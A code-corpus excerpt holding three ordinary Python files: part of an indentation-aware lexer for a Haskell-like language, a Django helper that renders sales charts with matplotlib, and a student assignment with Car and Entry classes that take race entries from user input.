self._state = self._State.FIND_INDENTATION
return self._make_token(AHToken.BeginBlock, "<Begin Block>")
# Precondition: self._lookaheadToken is None
def _state_find_indentation(self):
nextToken = self._skip_newlines()
currentIndentation = self._top_indentation()
if nextToken.type == Token.EOF:
# Empty block
self._push_indentation(currentIndentation + 1)
return self._gotoState(self._State.CLOSE_ALL_SCOPES)
if nextToken.column > currentIndentation:
self._push_indentation(nextToken.column)
self._lookaheadToken = nextToken
return self._gotoState(self._State.DEFAULT)
else:
# Empty block
self._push_indentation(currentIndentation + 1)
self._lookaheadToken = nextToken
return self._gotoState(self._State.CLOSE_SCOPE)
# Preconditions: * self._lookaheadToken is not None
# * lookaheadToken indentation is lower than top of
# indentation stack
def _state_close_scope(self):
token = self._lookaheadToken
assert token is not None
assert token.column < self._top_indentation()
if self._is_lowest_indentation_block():
raise LexerError(
"Indentation error. Indentation is lower than lowest block",
token.line, token.column, token.start)
self._pop_indentation()
currentIndentation = self._top_indentation()
if token.column < currentIndentation:
pass # Continue closing scopes
elif token.column == currentIndentation:
# Close block and process lookahead token as usual
self._state = self._State.DEFAULT
else: # token.column > currentIndentation
raise LexerError("Indentation error. Can't continue expression "
"after closing block", token.line, token.column,
token.start)
# TODO: creating tokens <Start Block> and <End Block> should be refactored
return self._make_token(AHToken.EndBlock, "<End Block>")
# Precondition: * self._lookaheadToken is None
# * last read token was EOF
def _state_close_all_scopes(self):
if self._is_lowest_indentation_block():
return self._gotoState(self._State.EOF)
self._pop_indentation()
return self._make_token(AHToken.EndBlock, "<End Block>")
# Precondition: * self._lookaheadToken is None
# * last read token was EOF
# * All indentation blocks are closed
def _state_eof(self):
return self._prelexer.emitEOF()
def _maybe_newline(self, newlineToken):
nextToken = self._skip_newlines()
if nextToken.type == Token.EOF:
self._state = self._State.CLOSE_ALL_SCOPES
return convertPreLexerTokenToAHToken(newlineToken)
currentIndentation = self._top_indentation()
if nextToken.column == currentIndentation:
# Alright, start new line
self._lookaheadToken = nextToken
self._state = self._State.DEFAULT
return convertPreLexerTokenToAHToken(newlineToken)
elif nextToken.column > currentIndentation:
# Just continue previous line
self._state = self._State.DEFAULT
return convertPreLexerTokenToAHToken(nextToken)
else:
# It's new line and also closing scope
self._lookaheadToken = nextToken
self._state = self._State.CLOSE_SCOPE
return convertPreLexerTokenToAHToken(newlineToken)
def _is_lowest_indentation_block(self):
return 1 == len(self._indentations)
def _push_indentation(self, value):
self._indentations.append(value)
def _pop_indentation(self):
return self._indentations.pop()
def _top_indentation(self):
return self._indentations[-1]
def _skip_newlines(self):
nextToken = self._prelexer.nextToken()
while nextToken.type == PreLexer.NEWLINE:
nextToken = self._prelexer.nextToken()
return nextToken
# TODO: this method name is not clear, it makes zero-width token
def _make_token(self, type, text):
pl = self._prelexer
return pl._factory.create(
pl._tokenFactorySourcePair,
type,
text,
pl.DEFAULT_TOKEN_CHANNEL,
pl._input.index,
pl._input.index - 1,
pl.line,
pl.column
)
def _gotoState(self, state):
self._state = state
return self._state_handlers[state.name]()
| demin-dmitriy/almost-haskell | src/AHLexer.py | AHLexer.py | py | 10,926 | python | en | code | 1 | github-code | 13 |
21043641485 | from profiles.models import Profile
from customers.models import Customer
from io import BytesIO
import base64
import matplotlib.pyplot as plt
def get_salesman(val):
return Profile.objects.get(id=val).user.username
def get_customer(val):
return Customer.objects.get(id=val).name
def get_graph():
buffer=BytesIO()
plt.savefig(buffer,format='png')
buffer.seek(0)
image_png=buffer.getvalue()
graph=base64.b64encode(image_png)
graph=graph.decode('utf-8')
buffer.close()
return graph
def get_key(res_by):
if res_by == '#1':
return 'transaction_id'
elif res_by == '#2':
return 'created'
def get_chart(chart_type,data,results_by,**kwargs):
plt.switch_backend('AGG')
fig=plt.figure(figsize=(10,4))
key=get_key(results_by)
# print(data)
d=data.groupby(key,as_index=False)['total_price'].agg('sum')
if chart_type =='#1':
# print('bar chart')
plt.bar(d[key],d['total_price'])
elif chart_type =='#2':
# print('pie')
plt.pie(data=d,x='total_price',labels=d[key].values)
elif chart_type=='#3':
# print('line')
plt.plot(d[key],d['total_price'],color='red',marker='*',linestyle='dotted')
else:
print('Wrong Choice')
plt.tight_layout()
chart=get_graph()
return chart | sandeep-045/python-training | django/reports_proj/sales/utils.py | utils.py | py | 1,355 | python | en | code | 0 | github-code | 13 |
42818968215 | import datetime as dt
class Car:
"""Representation of a car.
:param str make:
The make of the car.
:param str model:
The model of the car.
:param int year:
The car's year of manufacture.
"""
def __init__(self, make, model, year):
self.make = make
self.model = model
self.year = year
class Entry(Car):
"""A car to be entered into a race.
:param str driver:
The driver of the car.
:param int number:
The car's racing number.
"""
def __init__(self, make, model, year, driver, number):
super(Entry, self).__init__(make, model, year)
self.driver = driver
self.number = number
@classmethod
def user_input(cls):
"""Prompt the user for attributes for Entry.
:return:
Attributes for an Entry object.
"""
min_year = 1886
max_year = dt.date.today().year + 1
print(
"CARefully enter the data for each of the following prompts."
)
make = input("Make: ").strip().title()
model = input("Model: ").strip().title()
while True:
year = input("Year: ").strip()
try:
year = int(year)
except ValueError:
print(" The years of vehicle must be expressed as "
"integers.")
else:
if year < min_year:
print(f" Easy there, time traveller. The first car "
f"wasn't invented until {min_year}.")
elif year > max_year:
print(f" The {max_year + 1} models aren't even out "
f"yet, so why did you enter {year}?")
else:
break
driver = input("Driver: ").strip().title()
while True:
number = input("Number (0-99): ").strip()
try:
number = int(number)
except ValueError:
print(" Driver numbers must be expressed as integers.")
else:
if number in range(0, 99+1):
break
else:
print(" The number entered is out of range.")
return cls(make, model, year, driver, number)
# def print_entry(self):
# PEP8
def printEntry(self):
"""Prints the attributes of Entry object.
:rtype: None
"""
print(f"Make: {self.make}")
print(f"Model: {self.model}")
print(f"Year: {self.year}")
print(f"Driver: {self.driver}")
print(f"Number: {self.number}")
def main():
entries = []
while len(entries) < 3:
print(f"\nENTRY {len(entries) + 1}")
entry = Entry.user_input()
entries.append(entry)
print(
"\nVerbatim instructions:\n"
"\"Finally, write a section of the program that creates a list of 3\n"
"Entry objects. For each of these objects, prompt the user for the\n"
"the make, model, year, driver, and number. Finally print out this\n"
"list.\"\n"
"Printing the list of Entry objects:\n",
entries,
"\n"
)
entry_num = 1
for entry in entries:
print(f"---Printing details of ENTRY {entry_num}---")
entry.printEntry()
entry_num += 1
if __name__ == "__main__":
# x = dt.date.today().year + 1
# print(x)
# print(type(x))
# x = Entry.user_input()
# print(x)
# print(x.make)
main()
# All work and no play makes Jack a dull boy.
| smallpythoncode/csci161 | assignments/final/jahnke_kenneth_final_part4.py | jahnke_kenneth_final_part4.py | py | 3,609 | python | en | code | 0 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.